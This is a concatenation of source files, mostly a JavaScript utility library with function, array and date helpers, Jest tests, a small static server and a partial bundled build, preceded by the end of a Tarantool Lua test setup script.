box.schema.user.grant('test', 'read,write', 'space', 'test')
local msgpack = box.schema.space.create('msgpack')
msgpack:create_index('primary', {parts = {1, 'unsigned'}})
box.schema.user.grant('test', 'read,write', 'space', 'msgpack')
msgpack:insert{1, 'float as key', {[2.7] = {1, 2, 3}}}
msgpack:insert{2, 'array as key', {[{2, 7}] = {1, 2, 3}}}
msgpack:insert{3, 'array with float key as key', {[{[2.7] = 3, [7] = 7}] = {1, 2, 3}}}
msgpack:insert{6, 'array with string key as key', {['megusta'] = {1, 2, 3}}}
-- Grant the following functions to 'guest' user.
for _, func in ipairs({'test_4', 'is_positive'}) do
box.schema.func.create(func)
box.schema.user.grant('guest', 'execute', 'function', func);
end
end)
function test_1()
require('log').error('1')
return true, {
c = {
['106'] = {1, 1428578535},
['2'] = {1, 1428578535}
},
pc = {
['106'] = {1, 1428578535, 9243},
['2'] = {1, 1428578535, 9243}
},
s = {1, 1428578535},
u = 1428578535,
v = {}
}, true
end
function test_2()
return { k2 = 'v', k1 = 'v2'}
end
function test_3(x, y)
return x + y
end
function test_4()
return box.session.user()
end
function test_5()
if box.session.push == nil then
return false
end
for i = 1, 10 do
box.session.push({ position = i, value = 'i love maccartney' })
end
return true
end
function is_positive(x)
return x > 0
end
| tsafin/tarantool-c |
<|start_filename|>src/function.js<|end_filename|>
/** @module Function */
/**
* 将函数fn转为一次函数。返回函数,函数只能执行一次。
* @function noce
* @param {function} fn - 执行的函数。
* @return {function}
* @example
* const fn = once(() => '5')
* console.log([fn(), fn()])
* // => ['5', undefined]
*/
export const once = fn => {
let called = false
return function (...args) {
if (called) return
called = true
return fn.apply(this, args)
}
}
/**
* 将函数fn转为防抖函数。返回防抖函数。
* @function debounce
* @param {function} fn - 函数。
* @param {number} [delay=0] - 可选,防抖动延迟时长,单位为ms,默认为0。
* @returns {function}
* @example
* window.addEventListener('resize', U.debounce(() => {
* console.log(window.innerWidth);
* console.log(window.innerHeight);
* }, 250));
* // => 调整浏览器窗口尺寸,在250ms后控制台将打印一次窗口尺寸
*/
export const debounce = (fn, delay = 0) => {
let timeoutId
return function(...args) {
clearTimeout(timeoutId)
timeoutId = setTimeout(() => fn.apply(this, args), delay)
}
}
/**
* 将函数fn转为节流函数。返回节流函数。
* @function throttle
* @param {function} fn - 函数。
* @param {number} wait - 节流时长,单位为ms。
* @return {function}
* @example
* window.addEventListener('resize', U.throttle(function(evt) {
* console.log(window.innerWidth);
* console.log(window.innerHeight);
* }, 250));
* // 调整浏览器窗口尺寸,没间隔250ms控制台将打印一次窗口尺寸
*/
export const throttle = (fn, wait) => {
let inThrottle, lastFn, lastTime
return function() {
const context = this, args = arguments
if (!inThrottle) {
fn.apply(context, args)
lastTime = Date.now()
inThrottle = true
} else {
clearTimeout(lastFn)
lastFn = setTimeout(function() {
if (Date.now() - lastTime >= wait) {
fn.apply(context, args)
lastTime = Date.now()
}
}, Math.max(wait - (Date.now() - lastTime), 0))
}
}
}
/**
* 管道函数,占位符“$”为上一个函数的运算结果,如:pipe(x, `a |> b($, y)`) 等价于 b(a(x), y)。
* @function pipe
* @param {*} param - 函数参数。
* @param {string} line - 管道线。
* @return {*}
* @example
* const x = 1;
* const y = 3;
*
* const a = n => n + 1;
* const b = (x, y)=> x * y;
* const c = n => n * n;
*
* pipe(x, `a |> b($, y)`)
* // => 6
*
* pipe(x, `a |> c`)
* // => 4
*/
export const pipe = (param, line) => {
return line.split('|>')
.reduce((acc, fn) => {
fn = fn.indexOf('(') > -1
? fn.replace(/[\(|,]\s*\$\s*[\)|,]/g, w => w.replace('$', 'acc'))
: `${fn}(acc)`
return acc = new Function('acc', 'return ' + fn)(acc)
}, param)
}
<|start_filename|>src/array.js<|end_filename|>
/** @module Array */
import { isFunction } from './type'
/**
* 获取数组的最后一个值
* @function lastItem
* @param {array} arr - 源数组
* @return {*}
* @example
* let value = U.lastItem([1, 1, 2, 3])
* // => 3
*
* let value = U.lastItem([])
* // => undefined
*/
export const lastItem = arr => arr[arr.length -1]
/**
* 数组去重,返回无重复值的新数组。
* @function uniqueItems
* @param {array} arr - 需要去重的源数组
* @return {array}
* @example
* let arr = [1, 1, 2, 3, 3, 4, 5]
* arr = U.uniqueItems(arr)
* // => [1, 2, 3, 4, 5]
*/
export const uniqueItems = arr => [...new Set(arr)]
/**
* 根据提供的比较器函数返回数组的所有唯一值。
* @function uniqueItemsBy
* @param {array} arr - 数组
* @param {function} fn - 比较器函数
* @param {*} fn.a - 比较元素
* @param {*} fn.b - 比较元素
* @param {boolean} [isRight=false] - 可选,默认false,是否从数组最后一个元素开始比较
* @return {array}
* @example
* U.uniqueItemsBy([
* { id: 0, value: 'a' },
* { id: 1, value: 'b' },
* { id: 2, value: 'c' },
* { id: 0, value: 'd' }
* ],
* (a, b) => a.id == b.id)
* // => [{ id: 0, value: 'a' }, { id: 1, value: 'b' }, { id: 2, value: 'c' }]
*
* U.uniqueItemsBy([
* { id: 0, value: 'a' },
* { id: 1, value: 'b' },
* { id: 2, value: 'c' },
* { id: 0, value: 'd' }
* ],
* (a, b) => a.id == b.id,
* true)
* // => [{ id: 0, value: 'd' }, { id: 2, value: 'c' }, { id: 1, value: 'b' }]
*/
export const uniqueItemsBy = (arr, fn, isRight) => arr[isRight ? 'reduceRight' : 'reduce']((acc, x) => {
if (!acc.some(y => fn(x, y))) acc.push(x)
return acc
}, [])
/**
* 检索数组重复元素,返回新数组。
* @function repeatItems
* @param {array} arr - 数组
* @return {array}
* @example
* U.repeatItems([1, 1, 2, 3, 3, 4, 5])
* // => [1, 3]
*/
export const repeatItems = arr => arr.filter(
(item, i) => (
arr.indexOf(item) === i && arr.indexOf(item) !== arr.lastIndexOf(item)
)
)
/**
* 初始化一个给定长度以及值的数组。当映射是一个函数时提供迭代的i和数组长度len两个参数。
* @function initArray
* @param {number} len - 数组长度
* @param {*|function} [val|fn=null] - 可选,数组元素的映射值,默认为null;当映射是一个函数时,该函数参数如下表:
* @param {number} fn.index - 可选,数组中正在处理的当前元素的索引
* @param {number} fn.length - 可选,数组的长度
* @return {array}
* @example
* console.log(U.initArray(3))
* // => [null, null, null]
*
* const arr = U.initArray(3, {a: 1, b: 2})
* // => [ { a: 1, b: 2 }, { a: 1, b: 2 }, { a: 1, b: 2 } ]
*
* const arr = U.initArray(3, (i) => i * 2)
* // => [ 0, 2, 4 ]
*/
export const initArray = (len, val = null) => (
isFunction(val) ? Array.from({length: len}, (item, i) => val(i, len)) : Array.from({length: len}).fill(val)
)
/**
* 使用函数将数组的值映射到对象,其中键 - 值对由数组原始值作为键和映射值组成。
* @function mapObject
* @param {array} arr - 对象键名的数组
* @param {function(currentValue, index, array)} fn - 生成对象值的映射函数
* @param {*} fn.currentValue - 数组中正在处理的当前元素
* @param {number} fn.index - 可选,数组中正在处理的当前元素的索引
* @param {array} fn.array - 可选,当前正在处理的数组
* @return {object}
* @example
* const obj = U.mapObject([1, 2, 3], i => i * 2)
* // => {1: 2, 2: 4, 3: 6}
*/
export const mapObject = (arr, fn) => {
arr = [arr, arr.map(fn)]
return arr[0].reduce((acc, val, i) => {
acc[val] = arr[1][i]
return acc
}, {})
}
/**
* 求数组内元素特定键或键映射的平均值
* @function averageBy
* @param {array} arr - 求值数组
* @param {function|string} fn - 键值运算映射函数或键名
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
* U.averageBy(arr, 'a')
* // => 1.5
*
* U.averageBy(arr, o => o.a * o.b)
* // => 5
*/
export const averageBy = (arr, fn) => (
arr.map(isFunction(fn) ? fn : val => val[fn]).reduce((acc, v) => acc + v, 0) / arr.length
)
/**
* 求数组内元素特定键或键映射的最大值
* @function maxBy
* @param {array} arr - 求值数组
* @param {function|string} fn - 键值运算映射函数或键名
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
* U.max(arr, 'a')
* // => 2
*
* U.maxBy(arr, o => o.a * o.b)
* // => 8
*/
export const maxBy = (arr, fn) => Math.max(...arr.map(isFunction(fn) ? fn : v => v[fn]))
/**
* 求数组内元素特定键或键映射的最小值
* @function minBy
* @param {array} arr - 求值数组
* @param {function|string} fn - 键值运算映射函数或键名
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
* U.minBy(arr, 'a')
* // => 1
*
* U.minBy(arr, o => o.a * o.b)
* // => 2
*/
export const minBy = (arr, fn) => Math.min(...arr.map(isFunction(fn) ? fn : v => v[fn]))
/**
* 将数组切割分组函数
* @function chunk
* @param {array} arr - 切割的数组
* @param {number} size - 切割数组的长度
* @return {array}
* @example
* chunk([1, 2, 3, 4, 5], 2)
* => [[1,2],[3,4],[5]]
*/
export const chunk = (arr, size) => (
Array.from({ length: Math.ceil(arr.length / size) }, (v, i) =>
arr.slice(i * size, i * size + size)
)
)
<|start_filename|>server.js<|end_filename|>
const connect = require('connect')
const serveStatic = require('serve-static')
const cp = require('child_process')
const app = connect()
app.use(serveStatic(__dirname + '/docs')) // 可自动打开浏览器模块
// listen
const server = app.listen(3000)
server.on('listening', function () {
server.close()
app.listen(3000)
console.log('Server running at http://127.0.0.1:3000/')
cp.exec('start http://127.0.0.1:3000/')
})
<|start_filename|>src/usually.js<|end_filename|>
import { version } from '../package.json'
import * as usually from './index'
export default {
version,
...usually
}
<|start_filename|>test/number.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('isInt', () => {
expect(U.isInt(0)).toBeTruthy()
expect(U.isInt(1.15)).toBeFalsy()
expect(U.isInt('3')).toBeFalsy()
})
test('toThousands', () => {
expect(U.toThousands(-1545454)).toBe('-1,545,454')
expect(U.toThousands(1545454.1545)).toBe('1,545,454.1545')
expect(U.toThousands('1545454.1545', '-')).toBe('1-545-454.1545')
expect(U.toThousands(0)).toBe('0')
expect(U.toThousands(null)).toBe('0')
expect(U.toThousands(undefined)).toBe(NaN)
})
test('inRange', () => {
expect(U.inRange(5, 4)).toBeFalsy()
expect(U.inRange(5, 7)).toBeTruthy()
expect(U.inRange(5, 4, 7)).toBeTruthy()
expect(U.inRange(5, 7, 10)).toBeFalsy()
expect(U.inRange(5, 10, 7)).toBeFalsy()
})
test('round', () => {
expect(U.round(1.2006, 3)).toBe(1.201)
expect(U.round(1.2006)).toBe(1)
})
test('random', () => {
let a = U.random()
expect(a > 0 && a < 1).toBeTruthy()
a = U.random(3)
expect(a > 0 && a < 3).toBeTruthy()
a = U.random(undefined, 3)
expect(a > 0 && a < 3).toBeTruthy()
a = U.random(3, 5)
expect(a > 3 && a < 5).toBeTruthy()
a = U.random(5, 3)
expect(a > 3 && a < 5).toBeTruthy()
a = U.random(-1)
expect(a > -1 && a < 0).toBeTruthy()
a = U.random(-5, -3)
expect(a > -5 && a < -3).toBeTruthy()
})
test('keepFixed', () => {
let a = U.keepFixed(-15.12, 4) === '-15.1200'
expect(a).toBeTruthy()
a = U.keepFixed(-15.12, 4, false) === '-15.12'
expect(a).toBeTruthy()
a = U.keepFixed(15, 4) === '15.0000'
expect(a).toBeTruthy()
a = U.keepFixed(15, 4, false) === '15'
expect(a).toBeTruthy()
a = U.keepFixed(15.1234564, 4, false) === '15.1234'
expect(a).toBeTruthy()
})
test('average', () => {
let n = U.average(10, 20)
expect(n).toBe(15)
n = U.average(-10, -20, 30, 40)
expect(n).toBe(10)
})
<|start_filename|>src/date.js<|end_filename|>
/** @module Date */
/**
* 格式化日期。如果value无法被new Date()转换为日期对象,返回空字符串。
* @function dateFormat
* @param {date} [date=new Date()] - 可选,需要格式化的日期,默认是当前时间。
* @param {string} [format='YYYY-MM-DD']- 可选,格式化的格式,默认是`YYYY-MM-DD`格式。
* @return {string}
* @example
* U.dateFormat(new Date(2018, 11, 10))
* // => '2018-12-10'
*
* U.dateFormat(new Date(2018, 11, 10, 10, 29, 36), 'YYYY-MM-DD hh:mm:ss')
* // => '2018-12-10 10:29:36'
*
* U.dateFormat(1545484848484, 'YYYY-MM-DD hh:mm:ss')
* // => '2018-12-22 21:20:48'
*/
export const dateFormat = (date = new Date(), format = 'YYYY-MM-DD') => {
const d = new Date(date)
const zeroize = val => val < 10 ? `0${val}` : `${val}`
return format.replace(
/YYYY|MM|DD|hh|mm|ss/g,
word => ({
'YYYY': d.getFullYear(),
'MM': zeroize(d.getMonth() + 1),
'DD': zeroize(d.getDate()),
'hh': zeroize(d.getHours()),
'mm': zeroize(d.getMinutes()),
'ss': zeroize(d.getSeconds())
}[word] || word)
)
}
/**
* 获取某月的总天数,date可以是任意能被new Date()格式化为日期对象的值。
* @function getMonthDays
* @param {date} [date=new Date()] - 可选,日期,默认是当前时间。
* @return {number}
* @example
* U.getMonthDays(new Date(2018, 1))
* // => 28
*
* U.getMonthDays(153454878787)
* // => 30
*/
export const getMonthDays = (date = new Date()) => {
const d = new Date(date)
d.setMonth(d.getMonth() + 1)
d.setDate(0)
return d.getDate()
}
/**
* 获取星期名称,lang代表输出语言。date为日期,可以是任意能被new Date()格式化为日期对象的值。
* @function getWeekday
* @param {string} [lang='zh'] - 可选,输出语言,默认为'zh',当该值为undefined时取'zh'——表示中文,'en'——表示英文。
* @param {data} [date=new Date()] - 可选,日期,默认为当前日期。
* @return {string}
* @example
* U.getWeekday('zh', new Date(2018, 1, 1))
* // => '星期四'
*
* * U.getWeekday('zh', '2018/2/1')
* // => '星期四'
*
* U.getWeekday('en', 153454878787)
* // => 'Tuesday'
*/
export const getWeekday = (lang = 'zh', date = new Date()) => {
const day = new Date(date).getDay()
return lang === 'en'
? ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'][day]
: '星期' + '日一二三四五六'.charAt(day)
}
/**
* 获取上一个月份
* @function prevMonth
* @param {*} [date=new Date()]- 可选,日期,默认是当前时间。
* @return {date}
* @example
* U.prevMonth()
* // => 2018-11-20T17:07:37.937Z (当前时间为2018-12)
*
* U.prevMonth(new Date(2018, 10, 9))
* // => 2018-10-08T16:00:00.000Z
*
* U.prevMonth(153454878787)
* // => 1974-10-12T02:21:18.787Z
*
* U.prevMonth('2018/12/3')
* // => 2018-11-02T16:00:00.000Z
*/
export const prevMonth = (date = new Date()) => {
let d = new Date(date)
d.setMonth(d.getMonth() - 1)
return d
}
/**
* 获取下一个月份
* @function nextMonth
* @param {date} [date=new Date()] - 可选,日期,默认是当前时间。
* @return {date}
* @example
* U.nextMonth()
* // => 2019-01-20T17:13:15.179Z (当前时间为2018-12)
*
* U.nextMonth(new Date(2018, 10, 9))
* // => 2018-10-08T16:00:00.000Z
*
* U.nextMonth(153454878787)
* // => 1974-12-12T02:21:18.787Z
*
* U.nextMonth('2018/12/3')
* // => 2018-11-02T16:00:00.000Z
*/
export const nextMonth = (date = new Date()) => {
let d = new Date(date)
d.setMonth(d.getMonth() + 1)
return d
}
/**
* 比较日期dateA是否是dateB之后的日期,返回布尔值
* @function isAfterDate
* @param {date} dateA - 较后的日期。
* @param {date} dateB - 较前的日期。
* @return {boolean}
* @example
* U.isAfterDate('2018/11/1', '2018/11/30')
* // => false
*
* U.isAfterDate(new Date(2018, 12, 11), new Date(2018, 12, 10))
* // => true
*/
export const isAfterDate = (dateA, dateB) => new Date(dateA) > new Date(dateB)
/**
* 返回距离date为n天的日期
* @function spreadDate
* @param {number} n - 天数。当n为负数,返回过去的日期;当n为正数,返回未来的日期。
* @param {date} [date=new Date()] - 可选,日期,默认为当前日期。
* @return {date}
* @example
* U.spreadDate(1)
* // => Thu Feb 21 2019 21:01:53 GMT+0800 (当前时间:Wed Feb 20 2019 21:01:53 GMT+0800 )
*
* U.spreadDate(1)
* // => Thu Feb 19 2019 21:01:53 GMT+0800 (当前时间:Wed Feb 20 2019 21:01:53 GMT+0800 )
*
* U.spreadDate(7, new Date(2018, 9, 10))
* // => Wed Oct 17 2018 00:00:00 GMT+0800 (中国标准时间)
*/
export const spreadDate = (n, date = new Date()) => new Date(+date + n * 24 * 60 * 60 * 1000)
<|start_filename|>test/date.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('dateFormat', () => {
let d = U.dateFormat(new Date(2018, 11, 10))
expect(d).toBe('2018-12-10')
d = U.dateFormat() === U.dateFormat(new Date())
expect(d).toBeTruthy()
d = U.dateFormat(new Date(2018, 11, 10, 10, 29, 36), 'YYYY-MM-DD hh:mm:ss')
expect(d).toBe('2018-12-10 10:29:36')
d = U.dateFormat(1545484848484, 'YYYY-MM-DD hh:mm:ss')
expect(d).toBe('2018-12-22 21:20:48')
})
test('getMonthDays', () => {
let d = U.getMonthDays(new Date(2018, 1))
expect(d).toBe(28)
d = U.getMonthDays()
expect(d).toBe(U.getMonthDays(new Date()))
d = U.getMonthDays('2018/2/1')
expect(d).toBe(28)
d = U.getMonthDays(153454878787)
expect(d).toBe(30)
})
test('getWeekday', () => {
let d = U.getWeekday(undefined, new Date(2018, 1, 1))
expect(d).toBe('星期四')
d = U.getWeekday('zh', new Date(2018, 1, 1))
expect(d).toBe('星期四')
d = U.getWeekday()
expect(d).toBe(U.getWeekday(undefined, new Date()))
d = U.getWeekday('en', new Date(2018, 1, 1))
expect(d).toBe('Thursday')
d = U.getWeekday('zh', '2018/2/1')
expect(d).toBe('星期四')
d = U.getWeekday('en', 153454878787)
expect(d).toBe('Tuesday')
})
test('prevMonth', () => {
expect(U.prevMonth).toBeInstanceOf(Function)
let d = U.prevMonth(new Date(2018, 10, 9)).toISOString()
expect(d).toBe('2018-10-08T16:00:00.000Z')
d = U.prevMonth(153454878787).toISOString()
expect(d).toBe('1974-10-12T02:21:18.787Z')
d = U.prevMonth('2018/12/3').toISOString()
expect(d).toBe('2018-11-02T16:00:00.000Z')
})
test('nextMonth', () => {
let d = U.nextMonth(new Date(2018, 10, 9)).toISOString()
expect(d).toBe('2018-12-08T16:00:00.000Z')
d = U.nextMonth(153454878787).toISOString()
expect(d).toBe('1974-12-12T02:21:18.787Z')
d = U.nextMonth('2018/12/3').toISOString()
expect(d).toBe('2019-01-02T16:00:00.000Z')
})
test('isAfterDate', () => {
expect(U.isAfterDate).toBeInstanceOf(Function)
let d = U.isAfterDate('2018/11/1', '2018/11/30')
expect(d).toBeFalsy()
d = U.isAfterDate(new Date(2018, 12, 11), new Date(2018, 12, 10))
expect(d).toBeTruthy()
})
test('spreadDate', () => {
let d = U.spreadDate(7, new Date(2018, 9, 10)).toISOString()
expect(d).toBe('2018-10-16T16:00:00.000Z')
d = U.spreadDate(1).getTime() - U.spreadDate(-1).getTime() === 172800000
expect(d).toBeTruthy()
})
<|start_filename|>test/type.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('getType', () => {
let type = U.getType(new Set([1, 2]))
expect(type).toBe('set')
type = U.getType(undefined)
expect(type).toBe('undefined')
type = U.getType(null)
expect(type).toBe('null')
})
test('isNumber', () => {
const n1 = U.isNumber(3)
expect(n1).toBeTruthy()
const n2 = U.isNumber(Number.MIN_VALUE)
expect(n2).toBeTruthy()
const n3 = U.isNumber(Infinity)
expect(n3).toBeTruthy()
const n4 = U.isNumber('3')
expect(n4).toBeFalsy()
})
test('isString', () => {
expect(U.isString('3')).toBeTruthy()
expect(U.isString(3)).toBeFalsy()
})
test('isNull', () => {
expect(U.isNull(null)).toBeTruthy()
expect(U.isNull(3)).toBeFalsy()
})
test('isUndefined', () => {
expect(U.isUndefined(undefined)).toBeTruthy()
expect(U.isUndefined(null)).toBeFalsy()
})
test('isBoolean', () => {
expect(U.isBoolean(false)).toBeTruthy()
expect(U.isBoolean(null)).toBeFalsy()
})
test('isSymbol', () => {
expect(U.isSymbol(Symbol('x'))).toBeTruthy()
expect(U.isSymbol('x')).toBeFalsy()
})
test('isFunction', () => {
expect(U.isFunction(function () {})).toBeTruthy()
expect(U.isFunction(3)).toBeFalsy()
})
test('isArray', () => {
expect(U.isArray([])).toBeTruthy()
expect(U.isArray({})).toBeFalsy()
expect(U.isArray(null)).toBeFalsy()
})
test('isObject', () => {
expect(U.isObject({})).toBeTruthy()
expect(U.isObject([1, 2])).toBeFalsy()
expect(U.isObject(null)).toBeFalsy()
})
<|start_filename|>dist/usually.js<|end_filename|>
(function (global, factory) {
typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :
typeof define === 'function' && define.amd ? define(factory) :
(global.U = factory());
}(this, (function () { 'use strict';
function createCommonjsModule(fn, module) {
return module = { exports: {} }, fn(module, module.exports), module.exports;
}
var _global = createCommonjsModule(function (module) {
// https://github.com/zloirock/core-js/issues/86#issuecomment-115759028
var global = module.exports = typeof window != 'undefined' && window.Math == Math ? window : typeof self != 'undefined' && self.Math == Math ? self // eslint-disable-next-line no-new-func
: Function('return this')();
if (typeof __g == 'number') __g = global; // eslint-disable-line no-undef
});
var _core = createCommonjsModule(function (module) {
var core = module.exports = {
version: '2.6.9'
};
if (typeof __e == 'number') __e = core; // eslint-disable-line no-undef
});
var _core_1 = _core.version;
var _aFunction = function (it) {
if (typeof it != 'function') throw TypeError(it + ' is not a function!');
return it;
};
var _ctx = function (fn, that, length) {
_aFunction(fn);
if (that === undefined) return fn;
switch (length) {
case 1:
return function (a) {
return fn.call(that, a);
};
case 2:
return function (a, b) {
return fn.call(that, a, b);
};
case 3:
return function (a, b, c) {
return fn.call(that, a, b, c);
};
}
return function ()
/* ...args */
{
return fn.apply(that, arguments);
};
};
var _isObject = function (it) {
return typeof it === 'object' ? it !== null : typeof it === 'function';
};
var _anObject = function (it) {
if (!_isObject(it)) throw TypeError(it + ' is not an object!');
return it;
};
var _fails = function (exec) {
try {
return !!exec();
} catch (e) {
return true;
}
};
var _descriptors = !_fails(function () {
return Object.defineProperty({}, 'a', {
get: function () {
return 7;
}
}).a != 7;
});
var document = _global.document; // typeof document.createElement is 'object' in old IE
var is = _isObject(document) && _isObject(document.createElement);
var _domCreate = function (it) {
return is ? document.createElement(it) : {};
};
var _ie8DomDefine = !_descriptors && !_fails(function () {
return Object.defineProperty(_domCreate('div'), 'a', {
get: function () {
return 7;
}
}).a != 7;
});
// instead of the ES6 spec version, we didn't implement @@toPrimitive case
// and the second argument - flag - preferred type is a string
var _toPrimitive = function (it, S) {
if (!_isObject(it)) return it;
var fn, val;
if (S && typeof (fn = it.toString) == 'function' && !_isObject(val = fn.call(it))) return val;
if (typeof (fn = it.valueOf) == 'function' && !_isObject(val = fn.call(it))) return val;
if (!S && typeof (fn = it.toString) == 'function' && !_isObject(val = fn.call(it))) return val;
throw TypeError("Can't convert object to primitive value");
};
var dP = Object.defineProperty;
var f = _descriptors ? Object.defineProperty : function defineProperty(O, P, Attributes) {
_anObject(O);
P = _toPrimitive(P, true);
_anObject(Attributes);
if (_ie8DomDefine) try {
return dP(O, P, Attributes);
} catch (e) {
/* empty */
}
if ('get' in Attributes || 'set' in Attributes) throw TypeError('Accessors not supported!');
if ('value' in Attributes) O[P] = Attributes.value;
return O;
};
var _objectDp = {
f: f
};
var _propertyDesc = function (bitmap, value) {
return {
enumerable: !(bitmap & 1),
configurable: !(bitmap & 2),
writable: !(bitmap & 4),
value: value
};
};
var _hide = _descriptors ? function (object, key, value) {
return _objectDp.f(object, key, _propertyDesc(1, value));
} : function (object, key, value) {
object[key] = value;
return object;
};
var hasOwnProperty = {}.hasOwnProperty;
var _has = function (it, key) {
return hasOwnProperty.call(it, key);
};
var PROTOTYPE = 'prototype';
var $export = function (type, name, source) {
var IS_FORCED = type & $export.F;
var IS_GLOBAL = type & $export.G;
var IS_STATIC = type & $export.S;
var IS_PROTO = type & $export.P;
var IS_BIND = type & $export.B;
var IS_WRAP = type & $export.W;
var exports = IS_GLOBAL ? _core : _core[name] || (_core[name] = {});
var expProto = exports[PROTOTYPE];
var target = IS_GLOBAL ? _global : IS_STATIC ? _global[name] : (_global[name] || {})[PROTOTYPE];
var key, own, out;
if (IS_GLOBAL) source = name;
for (key in source) {
// contains in native
own = !IS_FORCED && target && target[key] !== undefined;
if (own && _has(exports, key)) continue; // export native or passed
out = own ? target[key] : source[key]; // prevent global pollution for namespaces
exports[key] = IS_GLOBAL && typeof target[key] != 'function' ? source[key] // bind timers to global for call from export context
: IS_BIND && own ? _ctx(out, _global) // wrap global constructors for prevent change them in library
: IS_WRAP && target[key] == out ? function (C) {
var F = function (a, b, c) {
if (this instanceof C) {
switch (arguments.length) {
case 0:
return new C();
case 1:
return new C(a);
case 2:
return new C(a, b);
}
return new C(a, b, c);
}
return C.apply(this, arguments);
};
F[PROTOTYPE] = C[PROTOTYPE];
return F; // make static versions for prototype methods
}(out) : IS_PROTO && typeof out == 'function' ? _ctx(Function.call, out) : out; // export proto methods to core.%CONSTRUCTOR%.methods.%NAME%
if (IS_PROTO) {
(exports.virtual || (exports.virtual = {}))[key] = out; // export proto methods to core.%CONSTRUCTOR%.prototype.%NAME%
if (type & $export.R && expProto && !expProto[key]) _hide(expProto, key, out);
}
}
}; // type bitmap
$export.F = 1; // forced
$export.G = 2; // global
$export.S = 4; // static
$export.P = 8; // proto
$export.B = 16; // bind
$export.W = 32; // wrap
$export.U = 64; // safe
$export.R = 128; // real proto method for `library`
var _export = $export;
_export(_export.S + _export.F * !_descriptors, 'Object', {
defineProperty: _objectDp.f
});
var $Object = _core.Object;
var defineProperty = function defineProperty(it, key, desc) {
return $Object.defineProperty(it, key, desc);
};
var defineProperty$1 = defineProperty;
var toString = {}.toString;
var _cof = function (it) {
return toString.call(it).slice(8, -1);
};
// eslint-disable-next-line no-prototype-builtins
var _iobject = Object('z').propertyIsEnumerable(0) ? Object : function (it) {
return _cof(it) == 'String' ? it.split('') : Object(it);
};
// 7.2.1 RequireObjectCoercible(argument)
var _defined = function (it) {
if (it == undefined) throw TypeError("Can't call method on " + it);
return it;
};
var _toIobject = function (it) {
return _iobject(_defined(it));
};
// 7.1.4 ToInteger
var ceil = Math.ceil;
var floor = Math.floor;
var _toInteger = function (it) {
return isNaN(it = +it) ? 0 : (it > 0 ? floor : ceil)(it);
};
var min = Math.min;
var _toLength = function (it) {
return it > 0 ? min(_toInteger(it), 0x1fffffffffffff) : 0; // pow(2, 53) - 1 == 9007199254740991
};
var max = Math.max;
var min$1 = Math.min;
var _toAbsoluteIndex = function (index, length) {
index = _toInteger(index);
return index < 0 ? max(index + length, 0) : min$1(index, length);
};
// true -> Array#includes
var _arrayIncludes = function (IS_INCLUDES) {
return function ($this, el, fromIndex) {
var O = _toIobject($this);
var length = _toLength(O.length);
var index = _toAbsoluteIndex(fromIndex, length);
var value; // Array#includes uses SameValueZero equality algorithm
// eslint-disable-next-line no-self-compare
if (IS_INCLUDES && el != el) while (length > index) {
value = O[index++]; // eslint-disable-next-line no-self-compare
if (value != value) return true; // Array#indexOf ignores holes, Array#includes - not
} else for (; length > index; index++) if (IS_INCLUDES || index in O) {
if (O[index] === el) return IS_INCLUDES || index || 0;
}
return !IS_INCLUDES && -1;
};
};
var _library = true;
var _shared = createCommonjsModule(function (module) {
var SHARED = '__core-js_shared__';
var store = _global[SHARED] || (_global[SHARED] = {});
(module.exports = function (key, value) {
return store[key] || (store[key] = value !== undefined ? value : {});
})('versions', []).push({
version: _core.version,
mode: _library ? 'pure' : 'global',
copyright: '© 2019 <NAME> (<EMAIL>)'
});
});
var id = 0;
var px = Math.random();
var _uid = function (key) {
return 'Symbol('.concat(key === undefined ? '' : key, ')_', (++id + px).toString(36));
};
var shared = _shared('keys');
var _sharedKey = function (key) {
return shared[key] || (shared[key] = _uid(key));
};
var arrayIndexOf = _arrayIncludes(false);
var IE_PROTO = _sharedKey('IE_PROTO');
var _objectKeysInternal = function (object, names) {
var O = _toIobject(object);
var i = 0;
var result = [];
var key;
for (key in O) if (key != IE_PROTO) _has(O, key) && result.push(key); // Don't enum bug & hidden keys
while (names.length > i) if (_has(O, key = names[i++])) {
~arrayIndexOf(result, key) || result.push(key);
}
return result;
};
// IE 8- don't enum bug keys
var _enumBugKeys = 'constructor,hasOwnProperty,isPrototypeOf,propertyIsEnumerable,toLocaleString,toString,valueOf'.split(',');
var _objectKeys = Object.keys || function keys(O) {
return _objectKeysInternal(O, _enumBugKeys);
};
var _objectDps = _descriptors ? Object.defineProperties : function defineProperties(O, Properties) {
_anObject(O);
var keys = _objectKeys(Properties);
var length = keys.length;
var i = 0;
var P;
while (length > i) _objectDp.f(O, P = keys[i++], Properties[P]);
return O;
};
_export(_export.S + _export.F * !_descriptors, 'Object', {
defineProperties: _objectDps
});
var $Object$1 = _core.Object;
var defineProperties = function defineProperties(T, D) {
return $Object$1.defineProperties(T, D);
};
var defineProperties$1 = defineProperties;
var hiddenKeys = _enumBugKeys.concat('length', 'prototype');
var f$1 = Object.getOwnPropertyNames || function getOwnPropertyNames(O) {
return _objectKeysInternal(O, hiddenKeys);
};
var _objectGopn = {
f: f$1
};
var f$2 = Object.getOwnPropertySymbols;
var _objectGops = {
f: f$2
};
var Reflect$1 = _global.Reflect;
var _ownKeys = Reflect$1 && Reflect$1.ownKeys || function ownKeys(it) {
var keys = _objectGopn.f(_anObject(it));
var getSymbols = _objectGops.f;
return getSymbols ? keys.concat(getSymbols(it)) : keys;
};
var f$3 = {}.propertyIsEnumerable;
var _objectPie = {
f: f$3
};
var gOPD = Object.getOwnPropertyDescriptor;
var f$4 = _descriptors ? gOPD : function getOwnPropertyDescriptor(O, P) {
O = _toIobject(O);
P = _toPrimitive(P, true);
if (_ie8DomDefine) try {
return gOPD(O, P);
} catch (e) {
/* empty */
}
if (_has(O, P)) return _propertyDesc(!_objectPie.f.call(O, P), O[P]);
};
var _objectGopd = {
f: f$4
};
var _createProperty = function (object, index, value) {
if (index in object) _objectDp.f(object, index, _propertyDesc(0, value));else object[index] = value;
};
_export(_export.S, 'Object', {
getOwnPropertyDescriptors: function getOwnPropertyDescriptors(object) {
var O = _toIobject(object);
var getDesc = _objectGopd.f;
var keys = _ownKeys(O);
